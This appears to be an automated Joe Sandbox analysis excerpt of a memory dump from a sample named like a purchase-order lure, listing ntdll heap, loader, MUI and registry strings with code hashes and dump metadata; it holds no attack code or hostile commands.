                                            • API String ID: 3446177414-1975516107
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                            • API String ID: 0-3063724069
                                            Strings
                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3481D262
                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 3481D196
                                            • @, xrefs: 3481D313
                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3481D146
                                            • @, xrefs: 3481D2AF
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3481D2C3
                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3481D0CF
                                            • @, xrefs: 3481D0FD
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                            • API String ID: 0-1356375266
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$\SysWOW64$minkernel\ntdll\ldrutil.c
                                            • API String ID: 0-1558337705
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-523794902
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                            • API String ID: 0-122214566
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 3489031E
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 348902E7
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 348902BD
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            Strings
                                            • Kernel-MUI-Number-Allowed, xrefs: 34845247
                                            • Kernel-MUI-Language-SKU, xrefs: 3484542B
                                            • WindowsExcludedProcs, xrefs: 3484522A
                                            • Kernel-MUI-Language-Disallowed, xrefs: 34845352
                                            • Kernel-MUI-Language-Allowed, xrefs: 3484527B
                                            Similarity
                                            • API ID:
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                            • API String ID: 0-258546922
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: Item:$ Language:$ Name:$SR - $Type:
                                            • API String ID: 0-3082644519
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlReAllocateHeap
                                            • API String ID: 0-941669491
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: $$.mui$.mun$SystemResources\
                                            • API String ID: 0-3047833772
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                            • API String ID: 0-2586055223
                                            Strings
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                            • API String ID: 2994545307-336120773
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                            • API String ID: 0-1391187441
                                            Strings
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                            • API String ID: 2994545307-4256168463
                                            APIs
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            Strings
                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 3487F8CC
                                            • HEAP[%wZ]: , xrefs: 3487F8AA
                                            • HEAP: , xrefs: 3487F8B7
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            Strings
                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 34821728
                                            • HEAP[%wZ]: , xrefs: 34821712
                                            • HEAP: , xrefs: 34821596
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                            • API String ID: 0-1145731471
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                            • API String ID: 0-3870751728
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: %$&$@
                                            • API String ID: 0-1537733988
                                            Strings
                                            • GlobalizationUserSettings, xrefs: 348FB834
                                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 348FB82A
                                            • TargetNtPath, xrefs: 348FB82F
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                            • API String ID: 0-505981995
                                            Strings
                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3487E6C6
                                            • HEAP[%wZ]: , xrefs: 3487E6A6
                                            • HEAP: , xrefs: 3487E6B3
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                            • API String ID: 0-1340214556
                                            Strings
                                            • LdrpCompleteMapModule, xrefs: 3488A590
                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 3488A589
                                            • minkernel\ntdll\ldrmap.c, xrefs: 3488A59A
                                            Similarity
                                            • API ID:
                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                            • API String ID: 0-1676968949
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                            • API String ID: 0-1151232445
                                            Strings
                                            • LdrpAllocateTls, xrefs: 34891B40
                                            • minkernel\ntdll\ldrtls.c, xrefs: 34891B4A
                                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 34891B39
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-4274184382
                                            Strings
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 2994545307-964947082
                                            • Opcode ID: 4b00c6b81ffa92080252dbfb5333b8ba14b416d68e24f43a81277018552e8e15
                                            • Instruction ID: c1d129c1b4c83ea67fa12aab8f6747db46b77118017c8b5d48d7f18ae4177b03
                                            • Opcode Fuzzy Hash: 4b00c6b81ffa92080252dbfb5333b8ba14b416d68e24f43a81277018552e8e15
                                            • Instruction Fuzzy Hash: 9841D0B9A07248EFE750CF98C980F6A7BB8EF0A350F40025FE925AB251C670DD49CB54
                                            Strings
                                            • RtlCreateActivationContext, xrefs: 348929F9
                                            • Actx , xrefs: 348533AC
                                            • SXS: %s() passed the empty activation context data, xrefs: 348929FE
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                            • API String ID: 0-859632880
                                            • Opcode ID: 983b087c60e7d044df175887c4f3036ecf5c2a0a0db6d782b07fcb11944544ad
                                            • Instruction ID: 2ab629a56fc6fe2bf962e08996ea8c7c01d6f34e62662133eee2aa3b1955833c
                                            • Opcode Fuzzy Hash: 983b087c60e7d044df175887c4f3036ecf5c2a0a0db6d782b07fcb11944544ad
                                            • Instruction Fuzzy Hash: 67311273610705EFEB12CE98D880F9637E5EB44760F418AA9ED04EF291CB70D841CB90
                                            Strings
                                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 348AB632
                                            • @, xrefs: 348AB670
                                            • GlobalFlag, xrefs: 348AB68F
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                            • API String ID: 0-4192008846
                                            • Opcode ID: ba07dcc51792b6dc1261c50032c1475e98ae9547e08ea3bef7d95953ef9ea772
                                            • Instruction ID: f45921f5d849d19a8f0e9437236344b02e5668c4f9003dc6eedc32bf5980b6c9
                                            • Opcode Fuzzy Hash: ba07dcc51792b6dc1261c50032c1475e98ae9547e08ea3bef7d95953ef9ea772
                                            • Instruction Fuzzy Hash: 9E315CB5E00209AFEB00EF98DC80AEEBB78EF44744F540569EA15A7250D7B49E04CBA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                            • API String ID: 0-1050206962
                                            • Opcode ID: 0d7410a55f9f7a3a6e452b8df2467c1b40eaa910565519f4db9c714cb205cec2
                                            • Instruction ID: 80ac67794ce3acf2e7a7e5ee49c825ab8d36790be9b685f8ed6ecf973fb1105f
                                            • Opcode Fuzzy Hash: 0d7410a55f9f7a3a6e452b8df2467c1b40eaa910565519f4db9c714cb205cec2
                                            • Instruction Fuzzy Hash: 72317C72D01619EFEB12DF94CC80EAEFBBDEB44658F4146A5EA14A7210D778DD048FA0
                                            Strings
                                            • DLL "%wZ" has TLS information at %p, xrefs: 34891A40
                                            • minkernel\ntdll\ldrtls.c, xrefs: 34891A51
                                            • LdrpInitializeTls, xrefs: 34891A47
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-931879808
                                            • Opcode ID: 394d3f82437ac36a7e20449f71d72ba6b6823c69c558be09648f46458a3c86b5
                                            • Instruction ID: 72756e0e4f4d20e4099ad73d683eb5d80d31c377dcf5f76bcaa855d269fd061a
                                            • Opcode Fuzzy Hash: 394d3f82437ac36a7e20449f71d72ba6b6823c69c558be09648f46458a3c86b5
                                            • Instruction Fuzzy Hash: BE31DF75E14304EFF7108B58CC85FAA7AE8FB457A4F460399E500B76A0DBB0AD41CB94
                                            Strings
                                            • @, xrefs: 348612A5
                                            • BuildLabEx, xrefs: 3486130F
                                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3486127B
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                            • API String ID: 0-3051831665
                                            • Opcode ID: 991d7967f58c5eb18215c5efcf2cb3dc5d1164b21c126946437f6540f9e1c90c
                                            • Instruction ID: d1657567f41c8f47bca368a92e8b7461e60c7f7021e6ebe59377a57140e9b186
                                            • Opcode Fuzzy Hash: 991d7967f58c5eb18215c5efcf2cb3dc5d1164b21c126946437f6540f9e1c90c
                                            • Instruction Fuzzy Hash: 2A31E47290061CEFEB51DF99CD40EDEBBBDEB84758F004225E616A7260D778DA05CB90
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: RtlValidateHeap
                                            • API String ID: 3446177414-1797218451
                                            • Opcode ID: c07796e9adff0bb5c43269584a34cda1c5c0ffbb04a03b35237abceb1a9da57e
                                            • Instruction ID: 3a4c9b9b1af2fd20c40350fcc249f1b42cb10f32b6a8686534096ff8aecd8100
                                            • Opcode Fuzzy Hash: c07796e9adff0bb5c43269584a34cda1c5c0ffbb04a03b35237abceb1a9da57e
                                            • Instruction Fuzzy Hash: 9841C176B05349DFEB02CF68C4A07EDBBA2FF45614F04835DD8626B280CB359941DB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7a01259834b697bffc79306140c8cf6d34e2d0ebd49bc045bd9dadcc01df89e7
                                            • Instruction ID: 5588f0396b866c6c62c73c6572be5d46192dbf6a88de3bf553f501e89ce9ec75
                                            • Opcode Fuzzy Hash: 7a01259834b697bffc79306140c8cf6d34e2d0ebd49bc045bd9dadcc01df89e7
                                            • Instruction Fuzzy Hash: EF614F75E05606EFEB08CF79C480A9DFBB5FF88240F14826AD419A7350DB74A981CBD4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@
                                            • API String ID: 0-149943524
                                            • Opcode ID: 4513a9d898fbb4aa6e6a3fbd90173c5ad65ab9f56a79bf0ca2a971d0577f80ce
                                            • Instruction ID: 83bf39447657c786d8aac31b232973fa53e1c55a45e38eb5e3fa61a6ba1d4210
                                            • Opcode Fuzzy Hash: 4513a9d898fbb4aa6e6a3fbd90173c5ad65ab9f56a79bf0ca2a971d0577f80ce
                                            • Instruction Fuzzy Hash: C532CEB860A3158FD765CF18C490B2FB7E5EF88784F504A1EF8959B2A0E774D940CB92
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 0928afdbf15f504d21477e13dc07f912808d108c8d0a6d90ee6b75f356e6bd16
                                            • Instruction ID: d61915dca91b62d2d5405d2c79108b48352ef938422a1ef31ee6c284e56bfa6a
                                            • Opcode Fuzzy Hash: 0928afdbf15f504d21477e13dc07f912808d108c8d0a6d90ee6b75f356e6bd16
                                            • Instruction Fuzzy Hash: 7331D235742B0AEFE7819F64CE40A89F7A9FF44354F404225D91097A50DBB0E8A0DBD0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$TargetPath
                                            • API String ID: 0-4164548946
                                            • Opcode ID: 7f787470cbab6fa4acd4ec02e3db44aa837aa38058d91b4648b1f8b68807874c
                                            • Instruction ID: 17fb0d2387080805b33a3ea37692290a05173953f23deb789cc422f7a0d977a4
                                            • Opcode Fuzzy Hash: 7f787470cbab6fa4acd4ec02e3db44aa837aa38058d91b4648b1f8b68807874c
                                            • Instruction Fuzzy Hash: 74812076A05B06DFE750CF18C894A9BB7E8FB88358F454B6DE9459B220D335DC05CB82
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \REGISTRY\USER\$\Software\Microsoft\Windows
                                            • API String ID: 0-4122831824
                                            • Opcode ID: 774c6b894f6a1bef29758d74b96144a0393cef1931f0b1206639e14be3508748
                                            • Instruction ID: ced4b311446c37e23b25b73d38de87e4215b5bb29e29fea6b03f57064a915ebf
                                            • Opcode Fuzzy Hash: 774c6b894f6a1bef29758d74b96144a0393cef1931f0b1206639e14be3508748
                                            • Instruction Fuzzy Hash: F391BE755247419FD710CF28C880B6BB7E4EB88764F100B2EE6A5CB290EBB4D945CB52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$$
                                            • API String ID: 3446177414-233714265
                                            • Opcode ID: e5e87763563502b0ff9aefd684dfc0b899d3c4633e6523aea97d539b22868a1a
                                            • Instruction ID: 879edff9450631fc0d91cc9d2959dbb2e21f809c70cf718a2aaf14dc0d11d464
                                            • Opcode Fuzzy Hash: e5e87763563502b0ff9aefd684dfc0b899d3c4633e6523aea97d539b22868a1a
                                            • Instruction Fuzzy Hash: B461BD79A06749DFEB21CFA8C580B9DBBB1FF48708F104269D6256B740CBB4A941DBD0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                            • API String ID: 0-118005554
                                            • Opcode ID: 8cd94a0459c7ad545084610bc674d8a6f8c019d39c07a475e829c2ea8ee5c2a1
                                            • Instruction ID: 37e10fb175953d6e524b5e3987407e747c9ced03893bafdfc65a0df7d8cfbbff
                                            • Opcode Fuzzy Hash: 8cd94a0459c7ad545084610bc674d8a6f8c019d39c07a475e829c2ea8ee5c2a1
                                            • Instruction Fuzzy Hash: 9531CF75209741DFE701CB28D844B1AB7E4EF8A750F040A6DF894CB390EBB8D905CB92
                                            Strings
                                            • RtlpInitializeAssemblyStorageMap, xrefs: 34892A90
                                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 34892A95
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                            • API String ID: 0-2653619699
                                            • Opcode ID: 8d674899108f1cad0d4101723b1c50e68a56c183cbd45222de42c3d9260aa338
                                            • Instruction ID: d448992479d2f76e3c8ed17109a76618dd00212d26e6211c644197582854cd82
                                            • Opcode Fuzzy Hash: 8d674899108f1cad0d4101723b1c50e68a56c183cbd45222de42c3d9260aa338
                                            • Instruction Fuzzy Hash: A1110CB6B01304FFF7258A8C9D41F9B76ED9B94B54F1482AD7904EB390D674CD4087A0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 18ce923405e58d17e32c1a99a65e227c3cc211f469aeb973c4a67a219e3500cb
                                            • Instruction ID: df5bca17d2b1820225a53a054612c90c10d211a9cfde4ee0f700b22f96e570a6
                                            • Opcode Fuzzy Hash: 18ce923405e58d17e32c1a99a65e227c3cc211f469aeb973c4a67a219e3500cb
                                            • Instruction Fuzzy Hash: E8B112B56093408FD354CF29C490A1ABBE1BF88704F544A6EF9A9D7352D770E985CB82
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 073a791ba44d1ed514644066665c105dc6634e90e1e80720361b176f7e608622
                                            • Instruction ID: d7d5a9506104eb91d9594182e5685b123bf88ce35ba831d7ef0bfa1ff964991d
                                            • Opcode Fuzzy Hash: 073a791ba44d1ed514644066665c105dc6634e90e1e80720361b176f7e608622
                                            • Instruction Fuzzy Hash: 42A17BB5608746CFE310CF29D480A1ABBF6FF88744F104A6EE59597350EB70E985CB92
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            APIs
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            APIs
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
